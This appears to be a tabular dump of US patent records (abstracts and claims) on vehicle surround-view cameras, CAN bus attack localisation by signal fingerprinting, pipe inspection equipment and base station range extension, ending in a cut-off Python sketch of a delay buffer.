The vehicular vision system of claim 19, wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of objects in separate respective enlarged views of the respective detected objects, and wherein the displayed multiple images comprise the single composite display image and the separate respective enlarged views of the respective detected objects. | A vehicular vision system includes a plurality of cameras disposed at a vehicle and having respective exterior fields of view, and a display screen for displaying images derived from captured image data in a surround view format where captured image data is merged to provide a single composite display image from a virtual viewing position. A control includes a processor that processes image data captured by the cameras to detect an object present in the field of view of at least one of the cameras. During a driving maneuver of the vehicle, the display screen displays surround view video images and responsive to detection of the object, the display screen displays an enlarged view of the detected object.1. A vehicular vision system comprising:
a plurality of cameras disposed at a vehicle equipped with the vehicular vision system and having respective exterior fields of view, the plurality of cameras comprising a forward viewing camera having at least a forward field of view, a rearward viewing camera having at least a rearward field of view, a driver-side sideward viewing camera at a driver side of the equipped vehicle and having at least a sideward field of view, and a passenger-side sideward viewing camera at a passenger side of the equipped vehicle and having at least a sideward field of view; a display screen for displaying video images derived from image data captured by the plurality of cameras in a surround view format where image data captured by the plurality of cameras is merged to provide a single composite display image representative of a view from a virtual viewing position; a control comprising a processor for processing image data captured by the plurality of cameras; wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects an object present in the field of view of at least one camera of the plurality of cameras; wherein, during a driving maneuver of the equipped vehicle, the display screen displays surround view video images derived from image data captured by the plurality of cameras; and wherein, during the driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays an enlarged view of the detected object. 2. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, centers the virtual viewing position on the detected object. 3. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, displays multiple images in a split screen format. 4. 
The vehicular vision system of claim 3, wherein the displayed multiple images comprise at least two displayed images of the detected object. 5. The vehicular vision system of claim 1, wherein the display screen displays the enlarged view of the detected object while also continuing to display a non-enlarged view of the detected object in the displayed surround view video images. 6. The vehicular vision system of claim 5, wherein the display screen displays the enlarged view of the detected object and the surround view video images in a split screen format. 7. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the displayed detected object. 8. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, highlights the detected object via a color change in the displayed images of the detected object. 9. The vehicular vision system of claim 1, wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of detected objects in separate respective enlarged views of the respective detected objects. 10. The vehicular vision system of claim 1, comprising a gesture sensing device operable to sense a gesture made by a driver of the equipped vehicle, wherein, responsive at least in part to determination, via the gesture sensing device, of a gesture made by the driver, the control adjusts at least one selected from the group consisting of (i) the virtual viewing position for the displayed composite image and (ii) a virtual viewing angle of the displayed composite image from the virtual viewing position. 11. 
The vehicular vision system of claim 10, wherein the control calculates the virtual viewing position or the virtual viewing angle in real time without use of precalculated mapping tables. 12. The vehicular vision system of claim 10, wherein the control adjusts the displayed images responsive to detection by the gesture sensing device of one or more fingers of a hand of the driver touching and moving at a touch screen of the gesture sensing device. 13. The vehicular vision system of claim 10, wherein the gesture sensing device comprises at least one of (i) a time of flight sensor, (ii) at least one camera having a field of view interior of the equipped vehicle, (iii) a single camera having a field of view interior of the equipped vehicle and comprising motion disparity detection, and (iv) two cameras having fields of view interior of the equipped vehicle and comprising stereo camera disparity detection. 14. The vehicular vision system of claim 10, wherein, responsive to a determination by the gesture sensing device of a head movement made by the driver of the equipped vehicle, the control adjusts a virtual viewing location of the displayed images. 15. A vehicular vision system comprising:
at least one camera disposed at a vehicle equipped with the vehicular vision system and having a respective exterior field of view, the at least one camera comprising a rearward viewing camera having at least a rearward field of view; a display screen for displaying video images derived from image data captured by the at least one camera; a control comprising a processor for processing image data captured by the at least one camera; wherein the control, responsive to processing at the control of image data captured by the at least one camera, detects an object present in the field of view of the at least one camera; wherein, during a reverse driving maneuver of the equipped vehicle, the display screen displays rearward view video images derived from image data captured by the at least one camera; and wherein, during the reverse driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays in a split screen format (i) an enlarged view of the detected object and (ii) the rearward view video images. 16. The vehicular vision system of claim 15, wherein the vehicular vision system, responsive to detection by the control of the object, centers a virtual viewing position on the detected object. 17. The vehicular vision system of claim 15, wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the displayed images of the detected object. 18. The vehicular vision system of claim 15, wherein the control, responsive to processing at the control of image data captured by the at least one camera, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of detected objects in separate respective enlarged views of the respective detected objects. 19. A vehicular vision system comprising:
a plurality of cameras disposed at a vehicle equipped with the vehicular vision system and having respective exterior fields of view, the plurality of cameras comprising a forward viewing camera having at least a forward field of view, a rearward viewing camera having at least a rearward field of view, a driver-side sideward viewing camera at a driver side of the equipped vehicle and having at least a sideward field of view, and a passenger-side sideward viewing camera at a passenger side of the equipped vehicle and having at least a sideward field of view; a display screen for displaying video images derived from image data captured by the plurality of cameras in a surround view format where image data captured by the plurality of cameras is merged to provide a single composite display image representative of a view from a virtual viewing position; a control comprising a processor for processing image data captured by the plurality of cameras; wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects an object present in the field of view of at least one camera of the plurality of cameras; wherein, during a driving maneuver of the equipped vehicle, the display screen displays surround view video images derived from image data captured by the plurality of cameras; wherein, during the driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays multiple images in a split screen format, and wherein the displayed multiple images comprise at least the single composite display image and an enlarged view of the detected object; and wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the detected object in at least one of the displayed multiple images. 20. 
The vehicular vision system of claim 19, wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of objects in separate respective enlarged views of the respective detected objects, and wherein the displayed multiple images comprise the single composite display image and the separate respective enlarged views of the respective detected objects. | 2,400 |
9,153 | 9,153 | 15,967,157 | 2,498 | A method for protecting a network against a cyberattack, in which for a message in the network first characteristics of a first transmission of the message are determined and an origin of the message in the network is determined by a comparison of the first characteristics with at least one fingerprint of at least one subscriber or a segment of the network or a transmission route. If a manipulation of the message is detected, a point of attack of the cyberattack in the network is detected and localized in particular on the basis of the origin of the message. | 1. A method for protecting a network against a cyberattack, comprising:
determining, for a message in the network, first characteristics of a first transmission of the message; determining an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localizing, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. 2. The method as recited in claim 1, wherein the at least one fingerprint is ascertained by a model from second characteristics of one of: (i) at least one second transmission by the network subscriber, (ii) a second transmission from the network segment, or (iii) a second transmission via the transmission route. 3. The method as recited in claim 2, wherein the model comprises one of a learning algorithm, a neural network, a stochastic model, a data-based model, or an automaton-based model. 4. The method as recited in claim 2, wherein the second characteristics are determined at least one of using external measuring equipment, and in a secure environment. 5. The method as recited in claim 2, wherein the second characteristics are determined one of: (i) using internal measuring equipment, (ii) in specific system states of the network, or (iii) in specific system states of a system comprising the network. 6. The method as recited in claim 2, wherein a predetermined test pattern is transmitted in the second transmission. 7. The method as recited in claim 1, wherein the at least one fingerprint is read in from an external source, the at least one fingerprint being at least one of: (i) received from the Internet, or (ii) transmitted into the network in a factory environment. 8. 
The method as recited in claim 1, wherein the manipulation is detected as a function of one of: (i) a comparison of a characteristic with at least one expected characteristic, the characteristic being a content of the first message, and the at least one expected characteristic being an expected content, or (ii) a comparison of a transmission time of the first message with an expected transmission time. 9. The method as recited in claim 1, wherein a manipulation is detected as a function of an origin of the first message. 10. The method as recited in claim 1, wherein the network is a CAN bus system. 11. The method as recited in claim 1, wherein the network is a vehicle-internal network and a vehicle-internal point of attack of a cyberattack on the network is localized from outside the vehicle. 12. The method as recited in claim 1, wherein at least one of the determination of the first characteristics, and the comparison with the at least one fingerprint, is performed by at least one vehicle control unit which is connected to the network. 13. The method as recited in claim 1, wherein the vehicle control unit has a monitoring unit that is integrated into one of a microcontroller or a transceiver of the vehicle control unit. 14. The method as recited in claim 1, wherein the vehicle control unit is one of a central control unit of the vehicle or a domain control unit of the vehicle. 15. The method as recited in claim 1, wherein at least one of the determination of the first characteristics and the comparison with the at least one fingerprint, is performed by one of: (i) at least one network subscriber specifically provided for monitoring, or (ii) a connected processing unit outside of the vehicle. 16. The method as recited in claim 1, wherein the first characteristics are determined on the basis of a step response or a pulse response of the network during the transmission. 17. 
The method as recited in claim 1, wherein the first characteristics comprise one of: (i) physical properties of the network, (ii) physical properties of transmission channels, (iii) physical properties of transmission media of the network, (iv) physical properties of a hardware of the network subscribers, (v) physical properties of transceivers or microcontrollers, (vi) physical properties of a topology of the network, or (vii) physical properties of network terminations or terminal resistors. 18. The method as recited in claim 1, wherein the first characteristics comprise one of: (i) a length of transmitted message bits, (ii) a jitter of the transmission, (iii) a current flow direction of the transmission, (iv) an inner resistance of a network subscriber during the transmission, (v) a voltage curve during the transmission, (vi) frequency components of the transmission, or (vii) a clock offset during the transmission. 19. The method as recited in claim 1, wherein the first characteristics comprise times of a transmission. 20. The method as recited in claim 1, wherein the first characteristics are introduced into the network or are reinforced in the network via hardware selection or hardware manipulation. 21. The method as recited in claim 1, wherein multiple different second characteristics are used for the at least one fingerprint. 22. The method as recited in claim 16, wherein on the basis of a variability of ascertained characteristics the model uses determined reliable characteristics for the at least one fingerprint. 23. The method as recited in claim 1, wherein data regarding the first characteristics or regarding the at least one fingerprint are distributed in the vehicle or are stored outside the vehicle on a server. 24. 
The method as recited in claim 1, wherein, in the event of a detected manipulation of the message, an error handling is performed, the error handling including one of: (i) a termination of the transmission of the message, (ii) an identification of the message as invalid, (iii) an exclusion of the localized point of attack from the network, (iv) a deactivation of a gateway of the network in order to cut off a localized point of attack of the network from other parts of the network, or (v) a transmission of a warning message about the detected manipulation. 25. The method as recited in claim 24, wherein the error handling is performed specifically for one of a localized network subscriber, a localized network segment, or a localized transmission route of the network. 26. The method as recited in claim 1, wherein the at least one fingerprint is adapted, newly prepared or newly received and stored if a message with an authorization that is sufficient for this purpose is received. 27. The method as recited in claim 1, wherein the fingerprint is one of: (i) adapted at specified time intervals, (ii) adapted in predetermined system states, (iii) newly prepared, or (iv) newly received and stored. 28. The method as recited in claim 1, wherein the first characteristics are determined for individual bits of the message. 29. The method as recited in claim 28, wherein the individual bits of the message are classified into one of four groups as a function of a digital value at a beginning and at an end of the respective individual bit and the comparison with the at least one fingerprint is performed separately for each group. 30. A device, designed to protect a network against a cyberattack as a subscriber, the device designed to:
determine, for a message in the network, first characteristics of a first transmission of the message; determine an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localize, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. 31. A non-transitory machine-readable storage medium on which is stored a computer program for protecting a network against a cyberattack, the computer program, when executed by a computer, causing the computer to perform:
determining, for a message in the network, first characteristics of a first transmission of the message; determining an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localizing, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. | A method for protecting a network against a cyberattack, in which for a message in the network first characteristics of a first transmission of the message are determined and an origin of the message in the network is determined by a comparison of the first characteristics with at least one fingerprint of at least one subscriber or a segment of the network or a transmission route. If a manipulation of the message is detected, a point of attack of the cyberattack in the network is detected and localized in particular on the basis of the origin of the message.1. A method for protecting a network against a cyberattack, comprising:
determining, for a message in the network, first characteristics of a first transmission of the message; determining an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localizing, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. 2. The method as recited in claim 1, wherein the at least one fingerprint is ascertained by a model from second characteristics of one of: (i) at least one second transmission by the network subscriber, (ii) a second transmission from the network segment, or (iii) a second transmission via the transmission route. 3. The method as recited in claim 2, wherein the model comprises one of a learning algorithm, a neural network, a stochastic model, a data-based model, or an automaton-based model. 4. The method as recited in claim 2, wherein the second characteristics are determined at least one of using external measuring equipment, and in a secure environment. 5. The method as recited in claim 2, wherein the second characteristics are determined one of: (i) using internal measuring equipment, (ii) in specific system states of the network, or (iii) in specific system states of a system comprising the network. 6. The method as recited in claim 2, wherein a predetermined test pattern is transmitted in the second transmission. 7. The method as recited in claim 1, wherein the at least one fingerprint is read in from an external source, the at least one fingerprint being at least one of: (i) received from the Internet, or (ii) transmitted into the network in a factory environment. 8. 
The method as recited in claim 1, wherein the manipulation is detected as a function of one of: (i) a comparison of a characteristic with at least one expected characteristic, the characteristic being a content of the first message, and the at least one expected characteristic being an expected content, or (ii) a comparison of a transmission time of the first message with an expected transmission time. 9. The method as recited in claim 1, wherein a manipulation is detected as a function of an origin of the first message. 10. The method as recited in claim 1, wherein the network is a CAN bus system. 11. The method as recited in claim 1, wherein the network is a vehicle-internal network and a vehicle-internal point of attack of a cyberattack on the network is localized from outside the vehicle. 12. The method as recited in claim 1, wherein at least one of the determination of the first characteristics, and the comparison with the at least one fingerprint, is performed by at least one vehicle control unit which is connected to the network. 13. The method as recited in claim 1, wherein the vehicle control unit has a monitoring unit that is integrated into one of a microcontroller or a transceiver of the vehicle control unit. 14. The method as recited in claim 1, wherein the vehicle control unit is one of a central control unit of the vehicle or a domain control unit of the vehicle. 15. The method as recited in claim 1, wherein at least one of the determination of the first characteristics and the comparison with the at least one fingerprint, is performed by one of: (i) at least one network subscriber specifically provided for monitoring, or (ii) a connected processing unit outside of the vehicle. 16. The method as recited in claim 1, wherein the first characteristics are determined on the basis of a step response or a pulse response of the network during the transmission. 17. 
The method as recited in claim 1, wherein the first characteristics comprise one of: (i) physical properties of the network, (ii) physical properties of transmission channels, (iii) physical properties of transmission media of the network, (iv) physical properties of a hardware of the network subscribers, (v) physical properties of transceivers or microcontrollers, (vi) physical properties of a topology of the network, or (vii) physical properties of network terminations or terminal resistors. 18. The method as recited in claim 1, wherein the first characteristics comprise one of: (i) a length of transmitted message bits, (ii) a jitter of the transmission, (iii) a current flow direction of the transmission, (iv) an inner resistance of a network subscriber during the transmission, (v) a voltage curve during the transmission, (vi) frequency components of the transmission, or (vii) a clock offset during the transmission. 19. The method as recited in claim 1, wherein the first characteristics comprise times of a transmission. 20. The method as recited in claim 1, wherein the first characteristics are introduced into the network or are reinforced in the network via hardware selection or hardware manipulation. 21. The method as recited in claim 1, wherein multiple different second characteristics are used for the at least one fingerprint. 22. The method as recited in claim 16, wherein on the basis of a variability of ascertained characteristics the model uses determined reliable characteristics for the at least one fingerprint. 23. The method as recited in claim 1, wherein data regarding the first characteristics or regarding the at least one fingerprint are distributed in the vehicle or are stored outside the vehicle on a server. 24. 
The method as recited in claim 1, wherein, in the event of a detected manipulation of the message, an error handling is performed, the error handling including one of: (i) a termination of the transmission of the message, (ii) an identification of the message as invalid, (iii) an exclusion of the localized point of attack from the network, (iv) a deactivation of a gateway of the network in order to cut off a localized point of attack of the network from other parts of the network, or (v) a transmission of a warning message about the detected manipulation. 25. The method as recited in claim 24, wherein the error handling is performed specifically for one of a localized network subscriber, a localized network segment, or a localized transmission route of the network. 26. The method as recited in claim 1, wherein the at least one fingerprint is adapted, newly prepared or newly received and stored if a message with an authorization that is sufficient for this purpose is received. 27. The method as recited in claim 1, wherein the fingerprint is one of: (i) adapted at specified time intervals, (ii) adapted in predetermined system states, (iii) newly prepared, or (iv) newly received and stored. 28. The method as recited in claim 1, wherein the first characteristics are determined for individual bits of the message. 29. The method as recited in claim 28, wherein the individual bits of the message are classified into one of four groups as a function of a digital value at a beginning and at an end of the respective individual bit and the comparison with the at least one fingerprint is performed separately for each group. 30. A device, designed to protect a network against a cyberattack as a subscriber, the device designed to:
determine, for a message in the network, first characteristics of a first transmission of the message; determine an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localize, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. 31. A non-transitory machine-readable storage medium on which is stored a computer program for protecting a network against a cyberattack, the computer program, when executed by a computer, causing the computer to perform:
determining, for a message in the network, first characteristics of a first transmission of the message; determining an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localizing, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. | 2,400 |
9,154 | 9,154 | 16,015,910 | 2,482 | A pipe inspection system includes a cable storage drum and a housing configured to removably receive and rotatably support the cable storage drum. A push-cable with a plurality of conductors is stored in the cable storage drum. A camera head is connected to a distal end of the push-cable. A slip-ring assembly has first and second mating portions that when mated provide conductive paths between the plurality of conductors at a proximal end of the push-cable and a display device. The first portion of the slip-ring assembly is mounted on the housing and the second portion of the slip-ring assembly is mounted on the removable cable storage drum. The system connection cable joining the inspection system with a display unit is removable and may be replaced with cables compatible with various alternate image display systems. | 1. A pipe inspection system, comprising:
a housing to removably receive and rotatably support a cable storage drum, the cable storage drum including a centrally mounted and axially projecting hub; a resilient push-cable with a plurality of conductors stored in the cable storage drum in a plurality of coils encircled on the centrally mounted and axially projecting hub; a camera head operatively connected to a distal end of the push-cable; and a wireless communication module attached to or disposed in the cable storage drum to wirelessly transmit images or video signals from the camera head to a communicatively coupled electronic device. 2. The system of claim 1, wherein the communicatively coupled electronic device is a buried object locator. 3. The system of claim 1, wherein the wireless communication module is disposed in the centrally mounted and axially projecting hub. 4. The system of claim 1 further comprising a slip-ring assembly having a first portion mounted on the housing and a second portion mounted on the cable storage drum. 5. The system of claim 4, wherein the first and second portions of the slip-ring assembly include mating connective elements that when mated provide an electrical connection between the plurality of conductors at a proximal end of the push-cable and a display device. 6. The system of claim 4 wherein one of the first and second portions of the slip-ring assembly includes a plurality of springs for biasing the contact pins into engagement with corresponding contact rings. 7. The system of claim 4, further comprising magnets disposed on the slip-ring assembly arranged to provide a rotational count of the cable storage drum. 8. The system of claim 1 wherein the housing includes first and second outer casings that are hingedly connected to open in clam shell fashion. | A pipe inspection system includes a cable storage drum and a housing configured to removably receive and rotatably support the cable storage drum. 
A push-cable with a plurality of conductors is stored in the cable storage drum. A camera head is connected to a distal end of the push-cable. A slip-ring assembly has first and second mating portions that when mated provide conductive paths between the plurality of conductors at a proximal end of the push-cable and a display device. The first portion of the slip-ring assembly is mounted on the housing and the second portion of the slip-ring assembly is mounted on the removable cable storage drum. The system connection cable joining the inspection system with a display unit is removable and may be replaced with cables compatible with various alternate image display systems.1. A pipe inspection system, comprising:
a housing to removably receive and rotatably support a cable storage drum, the cable storage drum including a centrally mounted and axially projecting hub; a resilient push-cable with a plurality of conductors stored in the cable storage drum in a plurality of coils encircled on the centrally mounted and axially projecting hub; a camera head operatively connected to a distal end of the push-cable; and a wireless communication module attached to or disposed in the cable storage drum to wirelessly transmit images or video signals from the camera head to a communicatively coupled electronic device. 2. The system of claim 1, wherein the communicatively coupled electronic device is a buried object locator. 3. The system of claim 1, wherein the wireless communication module is disposed in the centrally mounted and axially projecting hub. 4. The system of claim 1 further comprising a slip-ring assembly having a first portion mounted on the housing and a second portion mounted on the cable storage drum. 5. The system of claim 4, wherein the first and second portions of the slip-ring assembly include mating connective elements that when mated provide an electrical connection between the plurality of conductors at a proximal end of the push-cable and a display device. 6. The system of claim 4 wherein one of the first and second portions of the slip-ring assembly includes a plurality of springs for biasing the contact pins into engagement with corresponding contact rings. 7. The system of claim 4, further comprising magnets disposed on the slip-ring assembly arranged to provide a rotational count of the cable storage drum. 8. The system of claim 1 wherein the housing includes first and second outer casings that are hingedly connected to open in clam shell fashion. | 2,400 |
9,155 | 9,155 | 15,918,759 | 2,465 | Dynamic range extension of a base station. In one instance, the base station includes a base station modem having a modulator-demodulator, a clock buffer providing an advanced time signal to the modulator-demodulator, a receiver buffer coupled between the modulator-demodulator and a transceiver, a transmitter buffer coupled between the modulator-demodulator and the transceiver, and an electronic processor. The electronic processor is configured to determine a first amount by which to modify a range of a service region of the base station. The electronic processor is also configured to introduce a first delay in the receiver buffer corresponding to the first amount and introduce a second delay in the transmitter buffer corresponding to the first amount. | 1. A base station modem for dynamic range extension of a base station, the base station modem comprising:
a modulator-demodulator configured to be coupled to a transceiver of the base station; a clock buffer configured to receive a universal time source time and to provide a clock signal to the modulator-demodulator, wherein the clock signal is an advanced time of the universal time source time; a receiver buffer coupled between the modulator-demodulator and the transceiver configured to receive data signals from the transceiver and provide the data signals to the modulator-demodulator; a transmitter buffer coupled between the modulator-demodulator and the transceiver configured to receive data signals from the modulator-demodulator and provide the data signals to the transceiver; and an electronic processor coupled to the modulator-demodulator, the clock buffer, the receiver buffer, and the transmitter buffer and configured to:
determine a first amount by which to modify a range of a service region of the base station;
introduce a first delay in the receiver buffer corresponding to the first amount; and
introduce a second delay in the transmitter buffer corresponding to the first amount. 2. The base station modem of claim 1, wherein the electronic processor is further configured to:
introduce a maximum advance between the clock signal and the universal time source time such that the range of the service region is at a maximum extension range. 3. The base station modem of claim 2, wherein the first delay and the second delay are selected to decrease the range from the maximum extension range and to correspond to the first amount. 4. The base station modem of claim 1, wherein the electronic processor is further configured to:
determine a change in location of a mobile communication device in communication with the base station, wherein the first amount is determined such that the mobile communication device is within the service region of the base station. 5. The base station modem of claim 1, wherein the electronic processor is further configured to:
adjust one of a read pointer and a write pointer of the receiver buffer corresponding to the first delay to introduce the first delay in the receiver buffer. 6. The base station modem of claim 1, wherein the electronic processor is further configured to:
adjust one of a read pointer and a write pointer of the transmitter buffer corresponding to the second delay to introduce the second delay in the transmitter buffer. 7. The base station modem of claim 1, wherein the base station further comprises a plurality of sectors and wherein the first delay and the second delay are introduced to modify the range of the service region of a first sector of the plurality of sectors, a second sector from the plurality of sectors comprising:
a second modulator-demodulator configured to be coupled to a second transceiver of the base station; a second receiver buffer coupled between the second modulator-demodulator and the second transceiver configured to receive data signals from the second transceiver and provide the data signals to the second modulator-demodulator; a second transmitter buffer coupled between the second modulator-demodulator and the second transceiver configured to receive data signals from the second modulator-demodulator and provide the data signals to the second transceiver; and the electronic processor coupled to the second modulator-demodulator, the clock buffer, the second receiver buffer, and the second transmitter buffer and further configured to:
determine a second amount by which to modify a second range of a second service region of the second sector;
introduce a third delay in the second receiver buffer corresponding to the second amount; and
introduce a fourth delay in the second transmitter buffer corresponding to the second amount. 8. A method for dynamic range extension of a base station, the method comprising:
determining, with an electronic processor of a base station modem of the base station, a first amount by which to modify a range of a service region of the base station; introducing, with the electronic processor, a first delay in a receiver buffer coupled between a modulator-demodulator of the base station modem and a transceiver of the base station, the first delay corresponding to the first amount; and introducing, with the electronic processor, a second delay in a transmitter buffer coupled between the modulator-demodulator and the transceiver, the second delay corresponding to the first amount. 9. The method of claim 8, further comprising:
receiving, with a clock buffer coupled to the electronic processor and the modulator-demodulator, a universal time source time; and providing, with the clock buffer, a clock signal to the modulator-demodulator, wherein the clock signal is an advanced time of the universal time source time. 10. The method of claim 9, further comprising:
introducing a maximum advance between the clock signal and the universal time source time such that the range of the service region is at a maximum extension range. 11. The method of claim 10, wherein the first delay and the second delay are selected to decrease the range from the maximum extension range and to correspond to the first amount. 12. The method of claim 8, further comprising:
determining a change in location of a mobile communication device in communication with the base station, wherein the first amount is determined such that the mobile communication device is within the service region of the base station. 13. The method of claim 8, wherein introducing the first delay in the receiver buffer further comprises:
adjusting one of a read pointer and a write pointer of the receiver buffer corresponding to the first delay. 14. The method of claim 8, wherein introducing the second delay in the transmitter buffer further comprises:
adjusting one of a read pointer and a write pointer of the transmitter buffer corresponding to the second delay. 15. The method of claim 8, wherein the base station includes a plurality of sectors and wherein the first delay and the second delay are introduced to modify the range of the service region of a first sector of the plurality of sectors, the method comprising:
determining a second amount by which to modify a second range of a second service region of a second sector from the plurality of sectors; introducing a third delay in a second receiver buffer coupled between a second modulator-demodulator of the second sector and a second transceiver of the second sector, the third delay corresponding to the second amount; and introducing a fourth delay in a second transmitter buffer coupled between the second modulator-demodulator and the second transceiver, the fourth delay corresponding to the second amount. | Dynamic range extension of a base station. In one instance, the base station includes a base station modem having a modulator-demodulator, a clock buffer providing an advanced time signal to the modulator-demodulator, a receiver buffer coupled between the modulator-demodulator and a transceiver, a transmitter buffer coupled between the modulator-demodulator and the transceiver, and an electronic processor. The electronic processor is configured to determine a first amount by which to modify a range of a service region of the base station. The electronic processor is also configured to introduce a first delay in the receiver buffer corresponding to the first amount and introduce a second delay in the transmitter buffer corresponding to the first amount.1. A base station modem for dynamic range extension of a base station, the base station modem comprising:
a modulator-demodulator configured to be coupled to a transceiver of the base station; a clock buffer configured to receive a universal time source time and to provide a clock signal to the modulator-demodulator, wherein the clock signal is an advanced time of the universal time source time; a receiver buffer coupled between the modulator-demodulator and the transceiver configured to receive data signals from the transceiver and provide the data signals to the modulator-demodulator; a transmitter buffer coupled between the modulator-demodulator and the transceiver configured to receive data signals from the modulator-demodulator and provide the data signals to the transceiver; and an electronic processor coupled to the modulator-demodulator, the clock buffer, the receiver buffer, and the transmitter buffer and configured to:
determine a first amount by which to modify a range of a service region of the base station;
introduce a first delay in the receiver buffer corresponding to the first amount; and
introduce a second delay in the transmitter buffer corresponding to the first amount. 2. The base station modem of claim 1, wherein the electronic processor is further configured to:
introduce a maximum advance between the clock signal and the universal time source time such that the range of the service region is at a maximum extension range. 3. The base station modem of claim 2, wherein the first delay and the second delay are selected to decrease the range from the maximum extension range and to correspond to the first amount. 4. The base station modem of claim 1, wherein the electronic processor is further configured to:
determine a change in location of a mobile communication device in communication with the base station, wherein the first amount is determined such that the mobile communication device is within the service region of the base station. 5. The base station modem of claim 1, wherein the electronic processor is further configured to:
adjust one of a read pointer and a write pointer of the receiver buffer corresponding to the first delay to introduce the first delay in the receiver buffer. 6. The base station modem of claim 1, wherein the electronic processor is further configured to:
adjust one of a read pointer and a write pointer of the transmitter buffer corresponding to the second delay to introduce the second delay in the transmitter buffer. 7. The base station modem of claim 1, wherein the base station further comprises a plurality of sectors and wherein the first delay and the second delay are introduced to modify the range of the service region of a first sector of the plurality of sectors, a second sector from the plurality of sectors comprising:
a second modulator-demodulator configured to be coupled to a second transceiver of the base station; a second receiver buffer coupled between the second modulator-demodulator and the second transceiver configured to receive data signals from the second transceiver and provide the data signals to the second modulator-demodulator; a second transmitter buffer coupled between the second modulator-demodulator and the second transceiver configured to receive data signals from the second modulator-demodulator and provide the data signals to the second transceiver; and the electronic processor coupled to the second modulator-demodulator, the clock buffer, the second receiver buffer, and the second transmitter buffer and further configured to:
determine a second amount by which to modify a second range of a second service region of the second sector;
introduce a third delay in the second receiver buffer corresponding to the second amount; and
introduce a fourth delay in the second transmitter buffer corresponding to the second amount. 8. A method for dynamic range extension of a base station, the method comprising:
determining, with an electronic processor of a base station modem of the base station, a first amount by which to modify a range of a service region of the base station; introducing, with the electronic processor, a first delay in a receiver buffer coupled between a modulator-demodulator of the base station modem and a transceiver of the base station, the first delay corresponding to the first amount; and introducing, with the electronic processor, a second delay in a transmitter buffer coupled between the modulator-demodulator and the transceiver, the second delay corresponding to the first amount. 9. The method of claim 8, further comprising:
receiving, with a clock buffer coupled to the electronic processor and the modulator-demodulator, a universal time source time; and providing, with the clock buffer, a clock signal to the modulator-demodulator, wherein the clock signal is an advanced time of the universal time source time. 10. The method of claim 9, further comprising:
introducing a maximum advance between the clock signal and the universal time source time such that the range of the service region is at a maximum extension range. 11. The method of claim 10, wherein the first delay and the second delay are selected to decrease the range from the maximum extension range and to correspond to the first amount. 12. The method of claim 8, further comprising:
determining a change in location of a mobile communication device in communication with the base station, wherein the first amount is determined such that the mobile communication device is within the service region of the base station. 13. The method of claim 8, wherein introducing the first delay in the receiver buffer further comprises:
adjusting one of a read pointer and a write pointer of the receiver buffer corresponding to the first delay. 14. The method of claim 8, wherein introducing the second delay in the transmitter buffer further comprises:
adjusting one of a read pointer and a write pointer of the transmitter buffer corresponding to the second delay. 15. The method of claim 8, wherein the base station includes a plurality of sectors and wherein the first delay and the second delay are introduced to modify the range of the service region of a first sector of the plurality of sectors, the method comprising:
determining a second amount by which to modify a second range of a second service region of a second sector from the plurality of sectors; introducing a third delay in a second receiver buffer coupled between a second modulator-demodulator of the second sector and a second transceiver of the second sector, the third delay corresponding to the second amount; and introducing a fourth delay in a second transmitter buffer coupled between the second modulator-demodulator and the second transceiver, the fourth delay corresponding to the second amount. | 2,400 |
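The range-modification mechanism in the claims above — advance the modem clock to put the service region at a maximum extension range, then pull the range back by introducing matching delays in the receiver and transmitter buffers via read/write pointer adjustment — can be sketched as follows. This is a rough illustrative sketch, not the patented implementation: the class and function names, the ring-buffer realization, and the `SAMPLES_PER_KM` constant are all assumptions introduced for illustration.

```python
class DelayBuffer:
    """FIFO whose delay is the gap between its write and read pointers.

    Adjusting one pointer relative to the other introduces the delay,
    as in claims 5, 6, 13 and 14 (read/write pointer adjustment).
    """

    def __init__(self, size):
        self.buf = [0] * size
        self.size = size
        self.write_ptr = 0
        self.delay = 0  # delay in samples; must stay below size

    def set_delay(self, samples):
        # Move the effective read pointer back from the write pointer.
        self.delay = samples % self.size

    def push_pop(self, sample):
        # Write the newest sample, read the one `delay` slots behind it.
        self.buf[self.write_ptr] = sample
        read_ptr = (self.write_ptr - self.delay) % self.size
        out = self.buf[read_ptr]
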